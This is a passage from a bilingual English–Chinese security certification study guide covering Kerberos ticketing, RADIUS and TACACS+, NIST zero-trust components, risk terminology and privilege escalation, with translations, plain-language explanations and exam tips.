As long as the user enters the correct password, this step works. However, it fails if the user enters the incorrect password. When a client wants to access an object, such as a resource hosted on the network, it must request a ticket through the Kerberos server. The following steps are involved in this process: 1. The client sends its TGT back to the KDC with a request for access to the resource. 2. The KDC verifies that the TGT is valid and checks its access control matrix to verify that the user has sufficient privileges to access the requested resource. 3. The TGS generates a service ticket and sends it to the client. 4.

The client sends the service ticket to the server or service hosting the resource. 5. The server or service hosting the resource verifies the validity of the service ticket with the KDC. 6. Once identity and authorization are verified, Kerberos activity is complete. The server or service host then opens a session with the client and begins communications or data transmission. Kerberos is a versatile authentication mechanism that works over local LANs, remote access, and client/server resource requests. However, Kerberos 4. KDC

中文直译 / 整理

生成一个将由客户端和 Kerberos 服务器使用的会话密钥。 它使用用户 密码的哈希值对这个密钥进行加密。 KDC 还生成一个加密的时间戳 TGT。 5. KDC 随后将加密的会话密钥和加密的时间戳 TGT 发送给客户端。 6. 客户端安装 TGT 以供使用,直至其过期。 客户端还使用用户密码的 哈希值解密会话密钥。 请注意,用户的密码永远不会通过网络传输,但会被验证。 服务器使 用用户密码的哈希值加密一个对称密钥,而只有使用用户密码的哈希值才 能解密该密钥。 只要用户输入正确的密码,此步骤就能正常工作; 但如果 用户输入了错误的密码,则会失败。 当客户端想要访问一个对象(例如网络上托管的资源)时,必须通过 Kerberos 服务器请求票据。 此过程涉及以下步骤: 1. 客户端将其 TGT 发送回 KDC,并请求访问该资源。 2. KDC 验证 TGT 是否有效,并检查其访问控制矩阵,以确认用户是 否具有足够的权限访问所请求的资源。 3. TGS 生成服务票据并将其发送给客户端。 4. 客户端将服务票据发送给托管资源的服务器或服务。 5. 托管资源的服务器或服务与 KDC 验证服务票据的有效性。

6. 一旦身份和授权验证通过,Kerberos 活动即告完成。 随后,服务器或服 务主机与客户端建立会话并开始通信或数据传输。 Kerberos 是一种多功能的身份验证机制,可在本地局域网、远程访问和客户端/服 务器资源请求中工作。 然而,Kerberos

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

同一密钥、速度快、大数据加密常对应 symmetric。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
学习单元 27 / PDF P994

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

presents a single point of failure—the KDC. If the KDC is compromised, the secret key for every system on the network is also compromised. Also, if a KDC goes offline, no subject authentication can occur. It also has strict time requirements, and the default configuration requires that all systems be time-synchronized within 5 minutes of each other. If a system is not synchronized or the time is changed, a previously issued TGT will no longer be valid, and the system will not be able to receive any new tickets. In effect, the client will be denied access to any protected network resources. Administrators often configure a time synchronization system within a network.

In an Active Directory domain, one domain controller (DC) synchronizes its time with an external Network Time Protocol (NTP) server. All other DCs synchronize their time with the first DC. All other systems synchronize their time with one of the DCs when they log on. Kerberos uses port 88. RADIUS Remote Authentication Dial-in User Service (RADIUS) centralizes authentication for remote access connections, such as with VPNs or dial-up access. It is typically used when an organization has more than one network access server (or remote access server).

A user can connect to any network access server, which then passes on the user's credentials to the RADIUS server to verify authentication and authorization and to track accounting. In this context, the network access server is the RADIUS client, and a RADIUS server acts as an authentication server. The RADIUS server also provides AAA services for multiple remote access servers. Many internet service providers (ISPs) use RADIUS for authentication. Users can access the ISP from anywhere, and the ISP server then forwards the user's connection request to the RADIUS server. Organizations can also use RADIUS, and organizations often implement it with location-based security.

For example, if the user connects with an IP address, the system can use geolocation technologies to identify the user's location. Although it isn't as common today, some users still have Integrated Services Digital Network (ISDN) dial-up lines and use them to connect to VPNs. The RADIUS server can use callback security for an extra layer of protection. Users call in, and after authentication, the RADIUS server terminates the connection and initiates a call back to the user's predefined

中文直译 / 整理

存在单点故障——KDC。 如果 KDC 被攻破,网络上每个系统的密钥也会被泄 露。 此外,如果 KDC 下线,则无法进行任何主体身份验证。 它还有严格的时间要求,默认配置要求所有系统之间的时间差异不得超过5 分钟。 如果系统未同步或时间被更改,之前发放的TGT将不再有效,系统将 无法获取任何新票据。 实际上,客户端将被拒绝访问任何受保护的网络资源。 管理员通常会在网络内配置时间同步系统。 在Active Directory域中,一个域 控制器(DC)将其时间与外部网络时间协议(NTP)服务器同步。 其他所有 DC将其时间与第一个DC同步。 所有其他系统在登录时都会与其中一个DC同 步时间。 Kerberos使用端口88。 RADIUS 远程认证拨号用户服务(RADIUS) 集中管理远程访问连接(如VPN或拨号连 接)的认证。 当组织拥有多个网络访问服务器(或远程访问服务器)时,通常 会使用它。 用户可以连接到任意网络访问服务器,该服务器会将用户的凭据转 发给RADIUS服务器,以验证身份和授权,并记录计费信息。 在此上下文中, 网络访问服务器是RADIUS客户端,而RADIUS服务器充当认证服务器。

RADIUS服务器还为多个远程访问服务器提供AAA服务。 许多互联网服务提供商(ISP)使用RADIUS进行身份验证。 用户可以从任何 地方访问ISP,ISP服务器随后将用户的连接请求转发到RADIUS服务器。 组织还可以使用 RADIUS,并且通常将其与基于位置的安全性结合使用。 例如, 如果用户通过 IP 地址连接,系统可以使用地理定位技术识别用户的地理位置。 尽管如今已不那么常见,但仍有一些用户使用综合业务数字网(ISDN)拨号 线路连接到 VPN。 RADIUS 服务器可以使用回拨安全机制提供额外的保护层。 用户拨入后,经过身份验证,RADIUS 服务器会终止连接,并回拨到用户预定 义的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 28 / PDF P995

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

phone number. If a user's authentication credentials are compromised, the callback security prevents an attacker from using them. RADIUS uses the User Datagram Protocol (UDP) by default and encrypts only the password's exchange. It doesn't encrypt the entire session, but RADIUS can use other protocols to encrypt the data session. The current version is defined in RFC 2865. RFC 6614, designated as Experimental, defines how RADIUS can use Transport Layer Security (TLS) over Transmission Control Protocol (TCP). When using TLS, RADIUS uses TCP port 2083. RADIUS uses UDP port 1812 for RADIUS authentication and authorization messages and UDP port 1813 for RADIUS accounting messages.

RADIUS provides AAA services between network access servers and a shared authentication server. The network access server is the client of the RADIUS authentication server. TACACS+ Cisco developed Terminal Access Controller Access Control System Plus (TACACS+) and later released it as an open standard. It provides several improvements over the earlier versions and over RADIUS. It separates authentication, authorization, and accounting into separate processes, which can be hosted on three different servers if desired. Additionally, TACACS+ encrypts all of the authentication information, not just the password, as RADIUS does.

TACACS+ uses TCP port 49, providing a higher level of reliability for the packet transmissions. Zero-Trust Access Policy Enforcement Organizations are increasingly designing their networks and infrastructure using zero-trust principles. Unlike traditional “moat and castle” or defensein-depth designs, zero-trust presumes that there is no trust boundary and no network edge. Instead, each action is validated when requested as part of a continuous authentication process, and access is only allowed after policies are checked, including elements like identity, permissions, system

中文直译 / 整理

电话号码。 如果用户的认证凭证遭到泄露,回拨安全机制可防止攻击者利用这些 凭证。 RADIUS 默认使用用户数据报协议(UDP),仅加密密码的交换。 它不加密整 个会话,但 RADIUS 可以使用其他协议来加密数据会话。 当前版本在 RFC 2865 中定义。 RFC 6614 被指定为实验性标准,定义了 RADIUS 如何通过传输 控制协议(TCP)使用传输层安全(TLS)。 使用 TLS 时,RADIUS 使用 TCP 端口 2083。 RADIUS 使用 UDP 端口 1812 处 理 RADIUS 认证和授权消息,使用 UDP 端口 1813 处理 RADIUS 计费消息。 RADIUS 在网络访问服务器和共享认证服务器之间提供 AAA 服务。 网络访问服务器是 RADIUS 认证服务器的客户端。 TACACS+ 思科开发了终端访问控制器访问控制系统 Plus(TACACS+),并随后将 其发布为开放标准。 它在早期版本和 RADIUS 的基础上提供了多项改进。 它将认证、授权和计费分离为独立的过程,如果需要,可以分别部署在 三台不同的服务器上。

此外,TACACS+ 会加密所有认证信息,而不仅仅是 密码(RADIUS 仅加密密码)。 TACACS+ 使用 TCP 端口 49,为数据包传 输提供了更高的可靠性。 零信任访问策略执行 组织越来越多地使用零信任原则设计其网络和基础设施。 与传统的“护城河与 城堡”或纵深防御设计不同,零信任假设不存在信任边界,也不存在网络边缘。 相反,每个操作在请求时都会作为持续身份验证过程的一部分进行验证,只有 在检查策略后才允许访问,包括身份、权限、系统

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

纵深防御:纵深防御不是一道门,而是一层又一层控制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

多层控制串联、避免单点失败,就是 defense in depth。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
学习单元 29 / PDF P996

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

configuration and security status, threat intelligence data review, and security posture. Figure 14.3 shows NIST's logical diagram of a zero-trust architecture (ZTA). Note that a subject's use of a system (which is untrusted) connects through a policy enforcement point, allowing trusted transactions to the enterprise resources. The policy engine makes policy decisions based on rules that are then acted on by the policy administrator. FIGURE 14.3 NIST Zero-Trust core trust logical components Here are the key zero-trust components that you should be familiar with: Subjects are the users, services, or systems that request access or attempt to use rights.

Policy engines make policy decisions based on both rules and external systems like those shown above: threat intelligence, identity management, and SIEM devices, to name just a few. They use a trust algorithm that makes the decision to grant, deny, or revoke access to a given resource based on the factors used for input to the algorithm. Once a decision is made, it is logged and the policy administrator takes action based on the decision. Policy administrators are not individuals. Rather they are components that establish or remove the communication path between subjects and resources, including creating session-specific authentication tokens or credentials as needed.

In cases where access is denied, the policy administrator tells the policy enforcement point to end the session or connection.

中文直译 / 整理

配置和安全状态、威胁情报数据审查以及安全态势。 图 14.3展示了 NIST 的零信任架构(ZTA)逻辑图。 请注意,主体对系统 (不可信)的使用通过策略执行点连接,从而允许对企业资源进行可信事务。 策略引擎根据规则做出策略决策,然后由策略管理员执行。 图 14.3 NIST 零信任核心信任逻辑组件 以下是您应熟悉的零信任关键组件: 主体是请求访问或尝试使用权限的用户、服务或系统。 策略引擎基于规则和外部系统(如上图所示)做出策略决策:威胁情报、 身份管理以及 SIEM 设备等。 它们使用一种信任算法,根据输入算法的因 素决定授予、拒绝或撤销对特定资源的访问权限。 一旦做出决策,将被记 录,策略管理员将根据该决策采取行动。 策略管理员不是个体,而是用于在主体和资源之间建立或移除通信路径的 组件,必要时会创建会话特定的认证令牌或凭证。 当访问被拒绝时,策略 管理员会通知策略执行点终止会话或连接。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 30 / PDF P997

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Together, the policy engine and policy administrator are known as the policy decision point. Policy enforcement points communicate with policy administrators to forward requests from subjects and to receive instructions from them about connections to allow or end. While the policy enforcement point is shown as a single logical element above, they are commonly deployed with a local client or application and a gateway element that is part of the network path to services and resources. You can read the NIST publication about zero-trust at https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800- 207.pdf.

Understanding Access Control Attacks As mentioned in Chapter 13, one of the goals of access control is to prevent unauthorized access to objects. This includes access to any information system, including networks, services, communications links, and computers, and unauthorized access to data. In addition to controlling access, IT security methods seek to prevent unauthorized disclosure of data and unauthorized alteration of assets and to provide consistent availability of resources. In other words, IT security methods attempt to prevent the loss of confidentiality, loss of integrity, and loss of availability.

Security professionals need to be aware of common attack methods so that they can take proactive steps to prevent them, recognize them when they occur, and respond appropriately. The following sections provide a quick review of risk elements and cover common access control attacks. While this section focuses on access control attacks, it's important to realize that there are many other types of attacks covered in other chapters. For example, Chapter 6 covers various cryptanalytic attacks.

中文直译 / 整理

策略引擎和策略管理员共同被称为策略决策点。 策略执行点与策略管理员通信,以转发来自主体的请求,并接收它们关于 允许或终止连接的指令。 虽然上述策略执行点被显示为一个单一的逻辑元 素,但它们通常与本地客户端或应用程序以及网络路径中通往服务和资源 的网关组件一起部署。 您可以在以下位置阅读有关零信任的NIST出版物: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800- 207.pdf. 理解访问控制攻击 如第13章所述,访问控制的目标之一是防止对对象的未授权访问。 这包括对任 何信息系统(包括网络、服务、通信链路和计算机)的访问,以及对数据的未 授权访问。 除了控制访问外,IT安全方法还旨在防止数据的未授权披露、资产 的未授权篡改,并确保资源的持续可用性。 换句话说,IT安全方法试图防止机 密性丧失、完整性丧失和可用性丧失。 安全专业人员需要了解常见的攻击方法,以便能够采取主动措施防止攻击、 在攻击发生时识别攻击并做出适当响应。 以下部分将简要回顾风险要素,并 介绍常见的访问控制攻击。

虽然本节重点介绍访问控制攻击,但必须认识到其他章节还涵盖了多种其他 类型的攻击。 例如,第6章介绍了各种密码分析攻击。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 31 / PDF P998

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Crackers, Hackers, and Attackers Crackers are malicious individuals who are intent on waging an attack against a person or system. They attempt to crack the security of a system to exploit it, and they are typically motivated by greed, power, or recognition. Their actions can result in loss of property (such as data and intellectual property), disabled systems, compromised security, negative public opinion, loss of market share, reduced profitability, and lost productivity. In many situations, crackers are simply criminals. In the 1970s and 1980s, hackers were defined as technology enthusiasts with no malicious intent. However, the media now uses the term hacker in place of cracker.

Its use is so widespread that the definition has changed. To avoid confusion, in this book we typically use the term attacker for malicious intruders. An attack is any attempt to exploit the vulnerability of a system and compromise confidentiality, integrity, and/or availability. Risk Elements Chapter 2, “Personnel Security and Risk Management Concepts,” covers risk and risk management in more depth, but it's worth reiterating some terms in the context of access control attacks. A risk is the possibility or likelihood that a threat will exploit a vulnerability, resulting in a loss such as harm to an asset. A threat is a potential occurrence that can result in an undesirable outcome.

This includes potential attacks by criminals or other attackers. It also includes natural occurrences such as floods or earthquakes, as well as accidental acts by employees. A vulnerability is any type of weakness. The weakness can be due to a flaw or limitation in hardware or software. It can also be the absence of a security control, such as the absence of antivirus software on a computer. Risk management attempts to reduce or eliminate vulnerabilities or reduce the impact of potential threats by implementing controls or countermeasures. It is not possible, or financially desirable, to eliminate risk. Instead, an organization focuses on reducing the risks that can cause it the most harm.

Common Access Control Attacks

中文直译 / 整理

破解者、黑客与攻击者 破解者是意图对个人或系统发动攻击的恶意个体。 他们试图破解系统的安 全性以加以利用,通常受贪婪、权力或声誉的驱动。 他们的行为可能导致 财产损失(如数据和知识产权)、系统瘫痪、安全受损、负面公众舆论、 市场份额丧失、盈利能力下降以及生产力损失。 在许多情况下,破解者仅 仅是罪犯。 在20世纪70年代和80年代,黑客被定义为没有恶意意图的技术爱好者。 然而,如今媒体用黑客一词代替破解者。 这一用法如此普遍,以至于其定 义已经改变。 为避免混淆,本书中我们通常使用攻击者一词指代恶意入侵者。 攻击是指 任何试图利用系统漏洞以破坏机密性、完整性和/或可用性的行为。 风险要素 第2章,“人员安全与风险管理概念”,更深入地探讨了风险与风险管理,但在 访问控制攻击的背景下,重申一些术语仍有必要。 一个风险是指威胁利用漏洞 导致损失(如对资产造成损害)的可能性或可能性。 一个威胁是可能导致不良 后果的潜在事件,包括犯罪分子或其他攻击者的潜在攻击,也包括洪水或地震 等自然灾害,以及员工的意外行为。

一个漏洞是指任何类型的弱点,这种弱点 可能源于硬件或软件中的缺陷或限制,也可能表现为安全控制的缺失,例如计 算机上未安装防病毒软件。 风险管理通过实施控制措施或应对策略,试图减少或消除漏洞,或降低潜在威 胁的影响。 完全消除风险既不可行,也不经济。 相反,组织会专注于降低可能 对其造成最大危害的风险。 常见访问控制攻击

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 32 / PDF P999

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Access control attacks attempt to bypass or circumvent access control methods. As mentioned in Chapter 13, access control starts with identification, authentication, and authorization, and access control attacks often try to steal user credentials. After attackers have stolen a user's credentials, they can launch an online impersonation attack by logging in as the user and accessing the user's resources. In other cases, an access control attack can bypass authentication mechanisms and just steal the data. This book covers multiple attacks, and the following sections cover common attacks directly related to access control.

Privilege Escalation Privilege escalation refers to any situation that gives users more privileges than they should have. Normally, a regular user would have enough privileges to perform their job but no more. This includes rights and permissions on their own computer and on network servers, such as file servers. Chapter 13 covers most of the topics in objective 5.5, “Manage the identity and access provisioning life cycle.” However, we chose to place privilege escalation in this chapter because it is a key element in many successful attacks.

In contrast, local administrators have full rights and permissions on local computers, and domain administrators have full rights and permissions within a domain. Regular users should not have the same privileges as administrators. Attackers use privilege escalation techniques to gain elevated privileges. As an example, imagine a regular user opens a malicious attachment in a phishing email. The malware gives the attacker the same privileges as the user, which are severely limited in most situations. Privilege escalation is often described as horizontal privilege escalation and vertical privilege escalation.

Attackers combine the two to compromise as many systems and accounts as they can within a network.

中文直译 / 整理

访问控制攻击试图绕过或规避访问控制方法。 如第13章所述,访问控制始于 身份识别、身份验证和授权,而访问控制攻击通常试图窃取用户凭证。 攻击者 在窃取用户凭证后,可以通过以该用户身份登录并访问其资源来发起在线冒充 攻击。 在其他情况下,访问控制攻击可以绕过身份验证机制,直接窃取数据。 本书涵盖多种攻击方式,以下章节将直接介绍与访问控制密切相关的常见攻击。 权限提升 权限提升是指任何使用户获得超出其应有权限的情况。 通常,普通用户仅拥有 完成其工作所需的足够权限,而无更多权限。 这包括其本地计算机和网络服务 器(如文件服务器)上的权利和权限。 第13章涵盖了目标5.5“管理身份和访问供应生命周期”的大部分 内容。 然而,我们选择将权限提升放在本章,因为它是许多成功攻击 的关键要素。 相比之下,本地管理员在本地计算机上拥有完全的权利和权限,域管理员 在域内也拥有完全的权利和权限。 普通用户不应拥有与管理员相同的权限。 攻击者使用权限提升技术来获取更高权限。 例如,假设一个普通用户打开了钓 鱼邮件中的恶意附件,恶意软件将赋予攻击者与该用户相同的权限,而在大多 数情况下,这些权限是严重受限的。

权限提升通常被描述为水平权限提升和垂直权限提升。 攻击者将两者结合, 以在网络内尽可能多地入侵系统和账户。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
